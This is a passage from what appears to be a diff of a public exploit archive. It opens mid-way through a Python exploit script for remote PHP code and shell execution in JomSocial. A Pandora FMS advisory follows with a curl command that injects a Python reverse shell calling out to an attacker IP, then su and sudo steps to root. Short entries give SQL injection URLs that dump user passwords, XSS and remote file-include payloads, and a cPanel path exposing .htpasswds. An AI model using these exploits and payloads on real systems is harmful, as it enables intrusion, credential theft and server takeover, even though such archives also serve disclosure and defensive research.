exploit_request_data = 'option=community&no_html=1&task=azrul_ajax&func=photos,ajaxUploadAvatar&{0}=1&arg2=["_d_","Event"]&arg3=["_d_","374"]&arg4=["_d_","{1}"]'
json_data = '{{"call":["CStringHelper","escape", "{1}","{0}"]}}'
def __init__(self, url, user_agent = None, use_eval = True):
self.url = url
self._set_user_agent(user_agent)
self.use_eval = use_eval
self.token_regex = re.compile('<input type=\"hidden\" name=\"([\w\d]{32})\" value=\"1\" \/>')
self.cookie, self.token = self._retrieve_token()
self.result_regex = re.compile('method=\\\\"POST\\\\" enctype=\\\\"multipart\\\\/form-data\\\\"><br>(.*)<div id=\\\\"avatar-upload\\\\">', re.DOTALL)
self.command_regex = re.compile('(.*)\\[\\["as","ajax_calls","d",""\\]', re.DOTALL)
def _set_user_agent(self, user_agent):
self.user_agent = user_agent
def _make_opener(self, add_cookie = True):
opener = urllib2.build_opener()
if add_cookie:
opener.addheaders.append(('Cookie', self.cookie))
opener.addheaders.append(('Referer', self.url))
if self.user_agent:
opener.addheaders.append(('User-Agent', self.user_agent))
return opener
def _retrieve_token(self):
opener = self._make_opener(False)
sys.stdout.write('[i] Retrieving cookies and anti-CSRF token... ')
sys.stdout.flush()
req = opener.open(self.url, Exploit.token_request_data)
data = req.read()
token = self.token_regex.findall(data)
if len(token) < 1:
print 'Failed'
raise Exception("Could not retrieve anti-CSRF token")
print 'Done'
return (req.headers['Set-Cookie'], token[0])
def _do_call_function(self, function, parameter):
parameter = parameter.replace('"', '\\"')
json_data = Exploit.json_data.format(function, parameter)
json_data = urllib2.quote(json_data)
data = Exploit.exploit_request_data.format(self.token, json_data)
opener = self._make_opener()
req = opener.open(self.url, data)
if function == 'assert':
return req.read()
elif function in ['system', 'passthru']:
result = self.command_regex.findall(req.read())
if len(result) == 1:
return result[0]
else:
return "[+] Error executing command."
else:
result = self.result_regex.findall(req.read())
if len(result) == 1:
return result[0].replace('\\/', '/').replace('\\"', '"').replace('\\n', '\n')
else:
return "[+] Error executing command."
def call_function(self, function, parameter):
if self.use_eval:
return self.eval("echo {0}('{1}')".format(function, parameter))
else:
return self._do_call_function(function, parameter)
def disabled_functions(self):
return self.call_function("ini_get", "disable_functions")
def test_injection(self):
result = self.eval("echo 'HELLO' . ' - ' . 'WORLD';")
if 'HELLO - WORLD' in result:
print "[+] Code injection using eval works"
else:
print "[+] Code injection doesn't work. Try executing shell commands."
def eval(self, code):
if code [-1] != ';':
code = code + ';'
return self._do_call_function('assert', "@exit(@eval(@base64_decode('{0}')));".format(code.encode('base64').replace('\n', '')))
parser = argparse.ArgumentParser(
description="JomSocial >= 2.6 - Code execution exploit"
)
parser.add_argument('-u', '--url', help='the base URL', required=True)
parser.add_argument(
'-p',
'--php-code',
help='the PHP code to execute. Use \'-\' to read from stdin, or provide a file path to read from')
parser.add_argument('-s', '--shell-command', help='the shell command to execute')
parser.add_argument('-c', '--shell-function', help='the PHP function to use when executing shell commands', default="system")
parser.add_argument('-t', '--test', action='store_true', help='test the PHP code injection using eval', default=False)
parser.add_argument('-n', '--no-eval', action='store_false', help='don\'t use eval when executing shell commands', default=True)
args = parser.parse_args()
if not args.test and not args.php_code and not args.shell_command:
print '[-] Need -p, -t or -s to do something...'
exit(1)
url = args.url
try:
if not url.startswith('http://') and not url.startswith('https://'):
url = 'http://' + url
exploit = Exploit(url, use_eval=args.no_eval)
if args.test:
exploit.test_injection()
elif args.php_code:
code = args.php_code
if args.php_code == '-':
print '[i] Enter the code to be executed:'
code = sys.stdin.read()
elif os.path.isfile(code):
try:
fd = open(code)
code = fd.read()
fd.close()
except Exception:
print "[-] Error reading the file."
exit(1)
print '[+] Executing PHP code...'
print exploit.eval(code)
elif args.shell_command:
print exploit.call_function(args.shell_function, args.shell_command)
except Exception as ex:
print '[+] Error: ' + str(ex)

103
platforms/php/webapps/31436.txt Executable file
View file

@ -0,0 +1,103 @@
-----------
Author:
-----------
xistence < xistence[at]0x90[.]nl >
-------------------------
Affected products:
-------------------------
Pandora FMS 5.0RC1 and below
-------------------------
Affected vendors:
-------------------------
Pandora FMS
http://pandorafms.com/
-------------------------
Product description:
-------------------------
Enterprise IT Monitoring for Networks, Applications, Servers and Virtual
Infrastructure
----------
Details:
----------
[ 0x01 - Remote Code Execution ]
The Pandora 4.0.3 / 4.1 / 5.0 RC1 appliances are prone to security
vulnerabilities.
The Anytermd daemon used for the SSH/Telnet gateway on TCP port 8022/8023
is vulnerable to command injection in the "p" POST parameter,
which allows any unauthenticated attacker to execute arbitrary commands
with the rights of the "pandora" user.
The 4.1 and 5.0 RC1 appliances also fail to set a password for the "artica"
user during installation to the harddrive. It's not possible
to gain SSH access using this user if there's no password set. However it's
possible to use the above vulnerability to "su" to the "artica" user and
from there "sudo"
to the "root" user as "sudo" won't ask for a password either.
This issue doesn't exist in the 4.0.3 appliance.
Below are the steps to reproduce this. Gaining a shell as "pandora" is
possible on all Pandora versions,
the other privilege escalation steps are only on 4.1 / 5.0.
# Open a linux/osx terminal and run a netcat listener like this:
nc -vl 8888
# Execute the following curl command, replace "123.123.123.123" with the IP
of the Pandora server and "321.321.321.321" with the machine running netcat.
curl -i -s -k -X 'POST' \
-H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
--data-binary $'a=open&p=%60python -c \'import
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"321.321.321.321\",8888));os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\",\"-i\"]);\'%60' \
'http://123.123.123.123:8022/anyterm-module'
# In the netcat shell you'll receive a shell as user "pandora". Use the
following command to spawn a pty: python -c 'import
pty;pty.spawn("/bin/bash")'
# Change user to artica by doing a "su - artica". From here do a "sudo -s"
to gain a root shell. Below is how it should look like.
$ nc -vl 8888
python -c 'import pty;pty.spawn("/bin/bash")'
bash-4.1$ su - artica
su - artica
-bash-4.1$ id
id
uid=501(artica) gid=501(artica) groups=501(artica)
-bash-4.1$ sudo -s
sudo -s
[root@localhost artica]# id
id
uid=0(root) gid=0(root) groups=0(root)
[root@localhost artica]#
-----------
Solution:
-----------
Upgrade to Pandora FMS 5.0 final or later
--------------
Timeline:
--------------
04-10-2013 - Issues discovered and vendor notified
04-10-2013 - Reply from vendor stating they will fix it asap
10-10-2013 - Reply from vendor that they fixed the issue
04-11-2013 - Release of Pandora FMS 5.0 final
29-01-2014 - Public disclosure

8
platforms/php/webapps/31439.txt Executable file
View file

@ -0,0 +1,8 @@
source: http://www.securityfocus.com/bid/28300/info
cPanel is prone to an information-disclosure vulnerability.
An attacker can exploit this issue to determine programs that are running on the affected server and to view folders on other sites that are protected by a firewall. Information obtained may lead to further attacks.
http://www.example.com:2082/frontend/x/diskusage/index.html?showtree=/home/user/.htpasswds
http://www.example.com:2082/frontend/x/diskusage/index.html?showtree=/var

16
platforms/php/webapps/31441.txt Executable file
View file

@ -0,0 +1,16 @@
source: http://www.securityfocus.com/bid/28313/info
MyBlog is prone to multiple input-validation vulnerabilities, including:
- Multiple SQL-injection vulnerabilities
- Multiple remote file-include vulnerabilities
- A privilege-escalation vulnerability
An attacker may exploit these issues to compromise the affected application, execute arbitrary script code in the context of the webserver process, or pass malicious input to database queries, resulting in the modification of query logic or other attacks.
http://www.example.com/path/member.php?id='+union+select+password,2,3,4,5,6,7,8,9,10+from+myblog_users+/*
http://www.example.com/path/post.php?id='+union+select+2,3,user,password,6,7,8,9,10,11,12+from+myblog_users/*
http://www.example.com/path/vote.php?id='+union+select+password,3,4,5,6,7,8,9,10,11,12+from+myblog_users+/*
http://www.example.com/path/vote.php?mid='+union+select+password,3,4,5,6,7,8,9,10+from+myblog_users+/*
http://www.example.com/path/games.php?id=[shell]%00
http://www.example.com/path/games.php?scoreid=[shell]%00

15
platforms/php/webapps/31443.txt Executable file
View file

@ -0,0 +1,15 @@
source: http://www.securityfocus.com/bid/28333/info
CS-Cart is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
CS-Cart 1.3.2 is vulnerable; other versions may also be affected.
GET /cscart/index.php?target=products&mode=search&subcats=Y&type=extended&avail=Y&pshor=Y&pfull=Y&pname=Y&cid=3&q=%22%20style%3D%22background:url(javascript:alert(12345))%22%20OA%3D%22&.x=0&.y=0 HTTP/1.0
Cookie: cart_languageC=EN; csid=
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: 192.168.1.1
Referer: http://192.168.1.1/cscart/

8
platforms/php/webapps/31447.txt Executable file
View file

@ -0,0 +1,8 @@
source: http://www.securityfocus.com/bid/28353/info
News-Template is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/content/print/print.php?ide="><script>alert("CANAKKALE-GECiLMEZ")</script>
http://www.example.com/content/print/print.php?file_name="><script>alert("CANAKKALE-GECiLMEZ")</script>

8
platforms/php/webapps/31448.txt Executable file
View file

@ -0,0 +1,8 @@
source: http://www.securityfocus.com/bid/28361/info
The Datsogallery component for Joomla! and Mambo is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/index.php?option=com_datsogallery&func=detail&id='union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8,9,0,1,2,3,4,5+from+jos_users/*

9
platforms/php/webapps/31449.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28366/info
w-Agora is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
w-Agora 4.0 is vulnerable; other versions may also be affected.
http://www.example.com/w-agora_path/add_user.php?bn_dir_default=ZoRLu.txt?

9
platforms/php/webapps/31450.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28366/info
w-Agora is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
w-Agora 4.0 is vulnerable; other versions may also be affected.
http://www.example.com/w-agora_path/create_forum.php?bn_dir_default=ZoRLu.txt?

9
platforms/php/webapps/31451.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28366/info
w-Agora is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
w-Agora 4.0 is vulnerable; other versions may also be affected.
http://www.example.com/w-agora_path/create_user.php?bn_dir_default=ZoRLu.txt?

9
platforms/php/webapps/31452.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28366/info
w-Agora is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
w-Agora 4.0 is vulnerable; other versions may also be affected.
http://www.example.com/w-agora_path/delete_notes.php?bn_dir_default=ZoRLu.txt?

9
platforms/php/webapps/31453.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28366/info
w-Agora is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
w-Agora 4.0 is vulnerable; other versions may also be affected.
http://www.example.com/w-agora_path/delete_user.php?bn_dir_default=ZoRLu.txt?

9
platforms/php/webapps/31454.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28366/info
w-Agora is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
w-Agora 4.0 is vulnerable; other versions may also be affected.
http://www.example.com/w-agora_path/edit_forum.php?bn_dir_default=ZoRLu.txt?

9
platforms/php/webapps/31455.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28366/info
w-Agora is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
w-Agora 4.0 is vulnerable; other versions may also be affected.
http://www.example.com/w-agora_path/mail_users.php?bn_dir_default=ZoRLu.txt?

9
platforms/php/webapps/31456.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28366/info
w-Agora is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
w-Agora 4.0 is vulnerable; other versions may also be affected.
http://www.example.com/w-agora_path/moderate_notes.php?bn_dir_default=ZoRLu.txt?

9
platforms/php/webapps/31457.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28366/info
w-Agora is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
w-Agora 4.0 is vulnerable; other versions may also be affected.
http://www.example.com/w-agora_path/reorder_forums.php?bn_dir_default=ZoRLu.txt?